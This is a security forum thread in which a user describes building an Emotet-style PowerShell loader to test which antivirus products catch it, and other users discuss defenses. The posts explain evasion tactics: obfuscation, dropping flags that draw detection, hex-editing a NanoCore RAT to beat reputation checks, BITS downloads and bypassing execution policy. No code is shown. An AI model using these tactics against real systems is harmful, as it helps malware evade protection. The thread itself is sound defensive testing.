Q&A How well are you protected against Emotet?

McMcbrad

Level 20
Oct 16, 2020
967
Hi all,

I'm sure by now we have all heard about Emotet threat. The way it gets distributed is via documents with malicious Macro. Users are tricked into executing the macro.


Upon execution PowerShell is launched usually with -e argument (encoded string). After the -e argument an obfuscated code can be found.

To test antivirus protection capabilities, I have created an Emotet of my own.
It's actually a fairly simple loader.

It contains highly-obfuscated code, which has 3 commands only: it imports BitsTransfer Module, downloads a malicious file (really malicious,) and then runs it. This simulates the Emotet delivery method.

This is how my Emotet-wanna-be looks like.
View attachment 249029

Upon uploading it on VirusTotal VirusTotal
I saw there are 4 products flagging it immediately. Kaspersky, Eset, ZoneAlarm (Kaspersky again) and Cat-QuickHeal.

I then created a second version of it:
1605395752105.png


This time it didn't use a -noexit argument, which makes it less suspicious.
This time it has been detected only by Kaspersky.
More advanced explanation:


The sample imitates an Emotet loader, in fact I got inspired by Emotet, which Microsoft claims to have blocked with machine learning model in seconds... there was this sort of post on their blog, if I am not mistaken. Hope the Emotet team doesn’t come after me with copyright claims 😆

So I downloaded a malicious sample and uploaded it on a benign website (won’t disclose all details for security reasons). This way I bypassed web filter blacklists
The Emotet loader simulator uses BitsTransfer (Emotet uses System.Net.WebClient) to download the malicious file and write it on the Desktop. Writing to the desktop decreases machine learning sensitivity as opposed to writing in temp folder or somewhere else.
To make things a bit more interesting, I used a hex editor to modify slightly the malicious file downloaded, which bypassed any reputation technologies. Finally, PowerShell executes the sample. To decrease machine learning sensitivity throughout the whole process, on the second sample, I’ve removed attributes such as hidden window, no exit and others.
I used a tool widely available on the web to obfuscate the code, just like Emotet creators do. It hasn’t been encoded with base64 (unlike Emotet) but has been concatenated, which makes it human unreadable and also, bypasses signatures and heuristics. To bypass the execution policy, I ran the code as an argument, not as a script.
It took me less than 20 minutes to do all that and the result - few of them failed already. The malicious sample was a variant of nanocore rat (known for its privilege escalation) and was successfully executed in all test cases. There was not even a UAC prompt. Avast’s IDP kicked in and removed nanocore, but wasn’t smart enough to correlate it to my loader. Defender and Malwarebytes did nothing. Kaspersky detected everything upfront, Eset detected the first one, probably due to attributes, commonly used by malware.
 
Last edited:

McMcbrad

Level 20
Oct 16, 2020
967
From my test I can confirm Kaspersky is the most effective against this type of malware. But that wasn’t the main objective. The point was to prove that this 0-day performance observed in test labs is impossible.
Needless to say is, if I was an attacker, I could plant this code anywhere. From a document, to scheduled tasks, to your registry. Off the top of my head I can think of few ways I could redistribute it.
 
Last edited:

Andy Ful

Level 67
Verified
Trusted
Content Creator
Dec 23, 2014
5,629
Yeah now I'm using Simplewall and it seems the same (for free) as Glasswire except the shiny interface and extra checking option by Virustotal.
But this price is very good for 3 years.
Simplewall will not stop this attack except when you will block svchost.exe (not recommended to most users). This attack uses BITS which cannot be normally blocked by firewall.
 

McMcbrad

Level 20
Oct 16, 2020
967
Simplewall will not stop this attack except when you will block svchost.exe (not recommended to most users). This attack uses BITS which cannot be normally blocked by firewall.
I don’t think System.Net.WebClient can be blocked either.
I could go even further. I could choose to download a malicious dll instead of executable and utilise rundll32.exe.
 

SecurityNightmares

Level 32
Verified
Jan 9, 2020
2,092
Recommend Defender settings from ConfigureDefender with recommend settings (I use some extended settings) from Hard_Configurator are enough? Ah and of course with recommend settings from included Firewall tool (without blocking lolbins)

It's at least SRP with scripts blocked..
 
Last edited:

McMcbrad

Level 20
Oct 16, 2020
967
Recommend Defender settings from ConfigureDefender with recommend settings (I use some extended settings) from Hard_Configurator are enough? Ah and of course with recommend settings from included Firewall tool (without blocking lolbins)

It's at least SRP with scripts blocked..
Windows Defender now detects the first sample
As PowerSploit. Who knew I have created a PowerShell exploit...Everything felt like a joke 😅
We’ll see later today if it can stop brand new sample with Configure Defender.
 

McMcbrad

Level 20
Oct 16, 2020
967
The file gets downloaded by Windows Service Host and not by a browser or productivity app. To bypass your rating system, I could download either a dll instead of an executable or I could download an archive. If I were to take this seriously, I could obtain a certificate by Comodo themselves, which is a common tactic. So Comodo won’t help you either.
 

McMcbrad

Level 20
Oct 16, 2020
967
The file gets downloaded by Windows Service host and not by a browser or productivity app. To bypass your rating system, I could download either a dll instead of an executable or I could download an archive. If I were to take this seriously, I could obtain a certificate by Comodo themselves, which is a common tactic. So Comodo won’t help you either
 

Nagisa

Level 6
Verified
Jul 19, 2018
288
The file gets downloaded by Windows Service Host and not by a browser or productivity app. To bypass your rating system, I could download either a dll instead of an executable or I could download an archive. If I were to take this seriously, I could obtain a certificate by Comodo themselves, which is a common tactic. So Comodo won’t help you either.

I was actually aiming for blocking the very first powershell script that's executed when you open the file.

Upon execution PowerShell is launched usually with -e argument (encoded string). After the -e argument an obfuscated code can be found.
 

McMcbrad

Level 20
Oct 16, 2020
967
I was actually aiming for blocking the very first powershell script which downloads the actual malicious file.
It’s not a script, it’s a bat file that launches PowerShell with an argument, which misleads PowerShell that this is not a script, but rather a code that you personally typed and composed. Then PowerShell itself doesn’t do anything. It tells svchost to download and write the file. In the end it just executes it. To block this attack with 100% success, you need to block PowerShell invocation through WMI and CMD. I know how to do it with McAfee ENS, but I am not sure how it’s done on Comodo.
 

Nagisa

Level 6
Verified
Jul 19, 2018
288
It’s not a script, it’s a bat file that launches PowerShell with an argument, which misleads PowerShell that this is not a script, but rather a code that you personally typed and composed. Then PowerShell itself doesn’t do anything. It tells svchost to download and write the file. In the end it just executes it.
But still the .bat file has to be got executed by the office application first. Am I understand wrong?

Screenshot_3.png
 

McMcbrad

Level 20
Oct 16, 2020
967
But still the .bat file has to be got executed by the office application first. Am I understand wrong?

View attachment 249080
In my case I was lazy to put more effort, so you have to execute the bat file. It’s not through and office app, *.bat gets executed through CMD when you double-click the file.
If I were to embed this in a document, you don’t have to do anything else, other then clicking “allow content”. It will automatically do everything else for you. There are many other possible ways to run this code on your machine.

@Freud2004 Yes, first sample was blocked by Kaspersky and Eset. Eset detected it because I attempt to run PowerShell with a hidden window, which is a smart and generic method to detect this sort of malware. I have removed this parameter on the second attack and as suspected, Eset failed. Only Kaspersky blocked it. Avast was able to remove what I succeeded to download, based on the way it had been introduced. So you can’t really say it failed. It reported the link I generated (apparently) and it was blacklisted in minutes. This is the right approach and I must say I’m impressed.

Unfortunately I can’t test every AV myself, but I would be haply to provide a sample to malware testers on here.
 
Last edited:
Top